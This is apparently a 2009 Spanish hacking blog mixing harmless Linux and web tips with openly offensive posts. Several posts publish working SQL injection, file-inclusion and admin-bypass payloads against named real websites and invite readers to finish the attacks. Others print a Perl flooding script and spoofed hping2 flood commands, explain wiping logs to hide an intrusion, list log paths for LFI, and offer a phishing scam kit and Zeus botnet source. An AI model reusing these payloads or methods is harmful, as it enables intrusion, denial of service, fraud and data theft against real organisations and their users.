º || CaZs || º

Uso del YUM para distros de derivadas de rpm

2009-10-14T12:16:00.005+02:00

Yum es un instalador basado en paquetes rpm y las opciones mas comunes son:

yum update "actualizar dependencia y software"

yum search firefox* "busca archivos con firefox*

yum install firefox* "instala firefox*"

yum remove firefox* "desinstala firefox*"

yum clean all "limpieza de /var/cache/yum/"

Logs LFI

2009-09-26T00:22:00.002+02:00

Os pondre una recopilacion de logs para ataques LFI que ido recopilando

IRIX:

/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix

AIX:

 /var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog

SunOS:

/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log

Linux:

/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/wtmp
/etc/utmp
/opt/lampp/logs/error_log
/opt/lampp/logs/access_log
/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/var/log/wtmp
/var/run/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/acct
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log
/var/log/auth.log
/var/log/xferlog
/var/log/message
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth
/var/log/kern.log
/var/log/cron.log
/var/log/maillog
/var/log/qmail/
/var/log/httpd/
/var/log/lighttpd
/var/log/boot.log
/var/log/mysqld.log
/var/log/secure
/var/log/utmp
/var/log/wtmp
/var/log/yum.log
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/access_log
/root/.ksh_history
/root/.bash_history
/root/.bash_logut

 ...
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/error.log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log

Windows

c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\Apache Group\Apache\logs\access.log
c:\apache\logs\error.log
c:\apache\logs\access.log

Metrovalencia Blind sql

2009-09-09T00:31:00.002+02:00

Pues... bueno como hacia tiempo que no renovaba estoy OFF... pues me aburria una noche mas vien de chiripa encontre esto por si alguien le apetece explotarlo...

Panel: https://www.metrovalencia.es/admin/
Blind sql: http://www.metrovalencia.es/metro/?page_id=-5%20union%20select%201,2--

Instalando Firefox 3.6 alpha en ubuntU

2009-08-21T20:19:00.003+02:00

Bueno para que todo sepais la version alpha se llama namoroka, y ahora enseñare a como instalarla en ubuntu jaunty.
Primero bajaremos un tar.bz2

http://download.mozilla.org/?product=Namoroka-Alpha1&os=linux&lang=en-US

Ahora procedemos a la instalacion:

Una vez descargado hacemos
#sudo su
#tar -jvxf namoroka-3.6a1.tar.bz2

Luego cambiaremos el nombre
#mv namoroka-3.6a1.tar.bz2 firefox-3.6

Copiamos la carpeta
#cp -R firefox-3.6 /usr/lib/

Renombramos la carpeta de firefox "backup"
#mv /usr/bin/firefox /usr/bin/firefox.old

Por ultimo creamos un enlace simbolico
#ln -sv /usr/lib/firefox-3.6/firefox /usr/bin/firefox

Ya esta instalado y listo para probar!!

xss en youtube xd

2009-08-16T04:15:00.005+02:00

weno.. realmente no es un xss ... sinos q modifique un iframe xD con firebug!!
aqi la imagen

Empezando a programar eleccion...

2009-08-05T18:49:00.002+02:00

Lo mejor para aprender a programar seria seguir los siguientes lenguajes en orden:

html > php > javascript > css > xml > batch > visual basic > delphi bash > c > c++ > c# > asp > perl > python > ruby > j2me > asm > pascal > masm

Seria una buena forma de aprender los mejores lenguajes de programas

Exploit "terminos"

2009-08-05T18:44:00.002+02:00

Remote = se puede ejecutar externo al servidor vulnerable

Local = aquel que se ejecuta internamente al servidor

Ddos = denegacion del servicio...

PoC = proof of concept suene ser exploit casi compiadlos o c0des anti Script kiddies para que no cualquiera aga uso de ello

Shellcode= aprovechan bugs dentro de un programa para poder ejecutar comandos

Web Lfi

2009-08-04T20:32:00.001+02:00

http://www.sinzheimer.de/content/visitenkarte.php?page=../../../../etc/passwd

Sql inyection web vulnerable

2009-08-04T16:12:00.001+02:00

Pues nada la pereza me mata xD aqui dejo una a medias saquenla
http://www.notaria40.com/noticias_detalle.php?noticiasID=-1%20union%20select%201,version%28%29,3,4,5,6,7,8--

Error de script subiendo avatar a un steam

2009-08-04T02:48:00.002+02:00

Bueno .. pero la idea se me ocurrio cuando intentando subir un avatar a cuenta steam me salta un error...

y el error se produce en

var my_parent = window.parent.document;
thisImg = my_parent.getElementById('headerAvatarImg');
thisImg.src = 'http://media.steampowered.com/steamcommunity/public/images/avatars/6c/6c0547d90f920479d3669eee4ba6373c6b6a3a11_medium.jpg';

mmm funcionaria un bypass... subirle una shell??...

Reverse IP

2009-08-03T21:25:00.002+02:00

Bueno puesesta entrada la dedicare al reverse ip, que es un nombre domain asociado a una ip como podreis saber, un host puede alvergar muchas webs cada cual una configuracion distinta, lo que nos lleba a elegir un ataque mas amplio contra el host... pero como podemos saber todas esas webs... pues facil aqui os dejo unas paginas:

http://www.ip-adress.com/reverse_ip

http://www.domaintools.com/reverse-ip/

http://www.linkvendor.com/seo-tools/domains-from-ip.html

Introducción a los shellcodes en Linux

2009-08-02T03:44:00.001+02:00

Bueno buscando videos encontre este video, muy bien explicado de lo que es una shellcode =)

Robots.txt "google"

2009-07-31T05:08:00.001+02:00

Mmmm interesante informacion... aunque poco se... del famoso buscador de google

http://209.85.229.105/robots.txt <----www.google.es

Source code disclosure by CaZs

2009-07-29T22:22:00.001+02:00

Bueno aqi pongo el tuto

http://www.megaupload.com/?d=JZ6EL8L2

y un dork de un tal... " filthywinter " supongo que sera suyo...

inurl:forcedownload.php?=

XSS basico by CaZs

2009-07-29T04:52:00.001+02:00

Bueno mi tuto XSS basico primera parte del tuto!!

http://www.megaupload.com/?d=OZBM05H0

allinurl:/admin.php

2009-07-27T19:40:00.002+02:00

Bueno jeje me gustaria para quien lo sepa y para quien no lo agradable que es esta busqueda :P
allinurl:/admin.php si lo ponen en google salen panenes de admin jeje una tontera.. ^^

Error tonto de rtve panel de admin

2009-07-26T04:05:00.003+02:00

Bueno yo no se mucho sobre bypass panel de admin pero se basa en probar ... cosas como
User: admin
pass: ' OR '='
seria como una sql inyection una consulta...
osdejo aqui haber si lograis aceder :P

http://www.rtve.es/admin/

Scam de rapidshare 09'

2009-07-24T20:58:00.001+02:00

Aqui el scam para quien quiera usarlo sacado de mi ^^
http://www.megaupload.com/?d=PA99SNXU

Codigo source del modulo lunar Apolo 11

2009-07-23T14:08:00.001+02:00

Bueno esto se mereze una entrada en el blog el codigo liberado por la nasa este code es del mando lunar del apolo 11 =)

http://code.google.com/p/virtualagc/source/browse/trunk/Comanche055/CM_BODY_ATTITUDE.s?r=258

Botnets mas buscadas

2009-07-23T14:01:00.001+02:00

Botnet Zeus: Emplea el troyano del mismo nombre y se está empleando por sus funciones de keylogger para sustraer información valiosa. PCs infectados: 3.6 millones

Botnet Koobface: Emplea las redes sociales como Facebook o MySpace para distribuirse y su finalidad es convertir en zombies los equipos. PCs infectados: 2.9 millones

Botnet TidServ: Emplea técnicas clasicas para distribuirse (SPAM) y tiene capacidades de rootkit para ocultarse en el sistema, su objetivo hacer zombies. PCs infectados: 1.5 millones

Botnet Trojan.Fakeavalert: Empleada para distribuir antivirus de tipo 'rogue', PCs infectados: 1.4 millones

Botnet TR/Dldr.Agent.JKH: Empleada para hacer fraudes de tipo click. PCs infectados: 1.2 millones

Botnet Monkif: Empleada para secuestrar navegadores mediante BHO. PCs infectados: 520.000

Botnet Hamweq: Empleada para convertir equipos en zombies, se distribuye mediante dispositivos USB. PCs infectados: 480.000

Botnet Swizzor: Sirve como vehículo para introducir otra clase de malware. PCs infectados: 370.000

Botnet Gammima: Se está empleando para robar cuentas en juegos online. PCs infectados: 230.000

Botnet Conficker: ¡¡ sorpresa !! el tan cacareado Conficker a día de hoy apenas si entra en el top 10. PCs infectados: 210.000

Tengo la source de la botnet Zeus Si alguien la quiere que me agregue apocalipsis_91@msn.com
fuente:http://www.securitybydefault.com/2009/07/las-botnets-mas-buscadas.html

Sqli en la web de parterna (valencia)

2009-07-22T01:33:00.001+02:00

Bueno como no se me da sql en asp pongo aqui el error :P
http://www.ayto-paterna.es/web/ver_pagina.asp?id='

Shell en Quartdepoblet

2009-07-22T01:14:00.002+02:00

Bueno no le ize defaced porque ya se me adelantaron con la sQli pero bueno le subi otra shell -.-

Sql casi concluida

2009-07-20T15:02:00.001+02:00

Bueno terminen la sQl =)
http://www.ukcds.org.uk/pages.php?page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22,23+from+users

Mi tool en perl TCP UDP FLOODER

2009-07-19T20:00:00.005+02:00

Bueno pues hice un flood en perl me a costado un poco, ya que no se casi nada de perl estado toda la tarde :P con ayuda de manuales ^^ crea sockets a los puertos TCP y UDP.
PD: es mi primera herramienta flood =)

#!/usr/bin/perl
#FLoder TCP UDP
#Creado by CaZs =)

use IO::Socket;
$ARGC = @ARGV;
if ($ARGC != 3)
{
print("Introduce $0 <>\n");
exit(1);
}
($ip, $tcp, $udp) = @ARGV;

$sock = IO::Socket::INET->new(
PeerAddr => $ip,
PeerPort => $tcp,
Proto => 'tcp') or die "$! No se a creado el socket udp";

$sock = IO::Socket::INET->new(
PeerAddr => $ip,
PeerPort => $udp,
Proto => 'udp') or die "$! No se a creado el socket tcp";

packets:
while (1)
{
$size = rand() * rand() * rand();
print("Floodeando a la $ip por los puertos $tcp tcp $udp udp y el tamaño es $size\n");
send($socket, 0, $size);
}

Borrando huellas "logs de linux"

2009-07-18T16:28:00.002+02:00

Cuando acedes a un ordenador y logras obtener "root" y aces defaced lo mas importante es borrar logs en linux los logs mas importantes estan en la siguiente ruta:

UTMP:
/etc/utmp
/var/adm/utmp
/usr/adm/utmp
/usr/var/adm/utmp
/var/log/utmp

WTMP
/etc/wtmp
/var/adm/wtmp
/usr/adm/wtmp
/usr/var/adm/wtmp
/var/log/wtmp

LASTLOG:
/usr/var/adm/lastlog
/usr/adm/lastlog
/var/adm/lastlog
/var/log

ACCT:
/var/adm/acct

Luego estaran depende del administrador los logs pueden repartirse en distintos directorios... tambien apache tiene logs de conexiones bind lpad y etc... no olviden que el comando para borrar y forzar el borrado es:
rm -rf

Una sQl Inyection no concluida...

2009-07-17T03:43:00.000+02:00

Bueno le saque solo el numero de columnas y la deje a medias... alguien que sepa puede acabarla si quiere :P
Aqui la sQl inyection:
http://www.mathsrevision.net/gcse/pages.php?page=-1+union+select+1,2,3,4,5,version%28%29

xSS en la web del deportibo club futbol

2009-07-17T03:13:00.002+02:00

E aqui mi xSS temporal... quien entienda xss sabran cual es =)

www.canaldeportivo.com/

Buscando vulnerabilidades en bing "sustituyendo a google"

2009-07-17T02:56:00.000+02:00

La nueva busqueda para inyeciones sql !!

http://www.bing.com/search?q=%22Warning%3A+mysql_query%28%29%22+&go=&form=QBRE&filt=all

Flod al puerto udp hping2

2009-07-17T01:04:00.002+02:00

hping2 -2 -a IP1-spoofeada -a 7 -p 19 -k IP2

Un ataque al puerto UDP conectando el 7 como entrada y 19 de salida =) ay otras formas de acerlas como un loop infinito pero no tengo ganas de postearlo

Cracking for shop

2009-07-16T02:12:00.005+02:00

ö.Ò Manipulando la verdad virtual :P miren la foto y la diferencia de precios!!
en el siguiente link

Imagen Tienda online del sevilla

Un poco "Denial of service" con hping2

2009-07-15T02:48:00.003+02:00

Bueno la herramienta que usaremos sera hping2, y lo que enseñare es hacer un poco de "flood" a los protocols de puerto tcp

Atacando al protocolo TCP
"haciendo uso del icmp SYN

hping2 -S -a ip_spoofear -p 80 -k ip_objetibo

hping2 -i m100 -S -a ip_spoofear -p 80 -k ip_objetibo

Que significan las opciones:
-S = SYN
-a = ip_spoofear
-p = puerto a utilizar
-k = maquina de objetibo

Con esto haremos un SYN_FLOOD no lo usen los "lammos" sino entiendes lee un poco sobre ICMP

Como de rapido escribes tu?

2009-07-14T17:42:00.000+02:00

56 palabras

Speed test

301 Redireccion

2009-07-14T11:51:00.006+02:00

Hablaremos de los varios métodos de redireccion que hay para poner en una buen

-La redireccion no es nada mas que te lleva a una referencia de un link

Primer metodo "html"

< equiv="refresh" content="0;URL=http://etica-cazs.blogspot.com/">

Segundo metodo "php
<?php

header ("Location: http://etica-cazs.blogspot.com/");
?>
Tercer metodo "Javascript"
< type="text/javascript">
function redireccionar(){ 
  window.locationf="http://etica-cazs.blogspot.com/"; 
}  
setTimeout ("redireccionar()", 5000); //tiempo expresado en milisegundos

< /script>

.htaccess

2009-07-14T11:23:00.003+02:00

Que es .htaccess ?

Bueno como sabeis en linux el " . " delante de un nombre quiere decir que sera un archivo "oculto" y basicamente este archivo es un simple archivo de texto que usa apache para tener "una serie de reglas" determinando las directivas del servidor frente al uso de los visitantes o usuarios de la web.
En este archivo podremos incluir muchas series de normas, el cual pondre la mas usuales o importantes.

Para prevenir el listado de carpetas agreguen:

IndexIgnore *

Habilitar compresion de datos acidentales php:

php_value zlib.output_compression 16386

Escondiendo archivos como robots.txt:

Order allow,deny  Deny from all  Satisfy All

Error http 404 personalizado:

ErrorDocument 404 /errores/noencontrado.html

Bloquear "publicidad":

RewriteEngine on  RewriteCond %{HTTP_REFERER} publicidad\.com [NC,OR]  RewriteCond %{HTTP_REFERER} publcidad2\.com  RewriteRule .* - [F]

Que no salga las "www":

Options +FollowSymlinks  RewriteEngine on  RewriteCond %{http_host} ^www\.example\.com[nc]  RewriteRule ^(.*)$ http://example.com/$1 [r=301,nc]

Desconocer la extension que usas del lenguaje:

# Make PHP code look like unknown types
AddType application/x-httpd-php .cool


Y el mas importante para mi:

Bloqueo de robots maliciosos (archivo robots.txt):

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule .* - [F]

Hacking with google?

2009-07-14T03:55:00.002+02:00

Investigando yo mismo... pude encontrar algo nuevo... hackeando con google no, hackeando con "bing"
De algo servirá el nuevo buscador bing para que nos ayude en nuestras búsquedas =)

http://www.bing.com/search?q=%22Warning%3A+mysql_query()%22+&go=&form=QBRE&filt=all

Destripando a los antivirus

2009-07-14T03:26:00.003+02:00

Destripando a los antivirus

Como funcionan?
Pues la función de un antivirus es nada mas que mirar el archivo por dentro como es esto? pues sencillo.
El cual usan 3 métodos para detectar y neutralizar.

-Firmas
-Heurísticos
-Observación de acciones que se realizan

Que pasa cuando descargamos un archivo?

1-Entra uno de los métodos del AV análisis del código...
Pero que pasaría si el código maligno es procesado solo cuando la ejecucion?... a esto se le llamaria runtime "tiempo de ejecucion" el cual llama a la funcion maligna ejecutarse en ese momento de doble click
Para ello el Av debe estar cardagado de la "tarea de analisis de ejecucion a tiempo real"
No todos los tienen

2-La segunda opcion descargamos el archivo y podemos darle doble click y aunque tenga runtime el Av no se enterara...
Porque pasa esto?...pues simple el codigo malicioso esta cargado de lo que se llama scantime... cuando el proceso de descarga de archivo el Av lo esta analizando no es detectado no lo considerara maligno con lo cual, frente a un analisis no sera detectado.
Para ser efectivo en este caso deben tener una buena base de firmas.

K-vault

2009-07-14T00:50:00.003+02:00

K-vault, una comunidad donde puedes aprender informática, hablar de deportes, descargar películas...

Ingeneria Social Basico

2009-07-14T00:39:00.003+02:00

Bueno la ingeneria social se considera también una técnica de hacking, la cual de manipular a una persona en tu beneficio obteniendo cualquier dato de la persona...
Esta tecnica se puede mezclar en casi cualquier termino de hacking como spam,
El típico ejemplo

Como ves esto seria: [Spam + Ingeneria Social + Phishing = robo de contraseña]
Sigamos...
Vasandonos en la historia el mas famoso phreakers y hacker en menor termino kevin mitnick es el padre de la ingeneria social.
Según su opinión se basa en cuatro términos que copio aquí:

Código:

   1. Todos queremos ayudar.
2. El primer movimiento es siempre de confianza hacia el otro.
3. No nos gusta decir No.
4. A todos nos gusta que nos alaben.

Vasandonos en esto el usuario o atacante buscaría el punto débil de la víctima o persona atacada.
Una pequeña practica contra las grandes potencias de empresas "como internet teléfono y etc..." y acontinuacion les citare un pequeño dialogo:
A=atacante
B=empresa

Código:

    A: hola
B: Si, en que puedo ayudarle?
A: mire que tengo un moden y hace como cosa de tres años que estoy aqui ... y resulta que me acaban de llamar que si me cambiaba de compañia de internet, me ofrecian lo siguiente:
-router gratis
-instalacion gratis
-dos meses gratis
-y llamadas nacionales gratis
Y bueno queria darme de baja.
B:Como es eso si usted nunca a tenido problemas con nosotros, no deseamos que se vaya de nuestra compañia, cual seria los motivos?
A:Pues los motivos son esos que me ofrecen cosas mejores.
B:Ah pues eso tiene arreglo nosotros le ofrecemos
-Router wifi gratis
-Tarifa plana nacional
-Tres meses del 16% de descuento de sus facturas

Como veis es un caso, un poco de ingeneria social por las dos partes tu les vendes la moto con que te lo ponen mas baratos y ellos para que no te vayas te la dan mejor...Y pensareis.. como después de los años que se supone que estaba contrado el servicio no te ofrecen eso simple, no te han ofrecido ninguna oferta con lo cual la compañía no sufre hay oferta, aplican ingeneria social o "un poco de marketing"

La ingeneria social es un campo muy habierto, cuando mas imaginación tengáis mas podréis imagina que cosas hacer...
Claves para una buena ingeneria social:

Código:

 -Utilizar palabras adecuadas
-Pensar de antelacion las acciones a cometer
-Tener siempre un as en la manga
-En cualquier caso no perder la calma
-Estate atento de cualquier situacion externa al entorno y intenta aprobechar de ella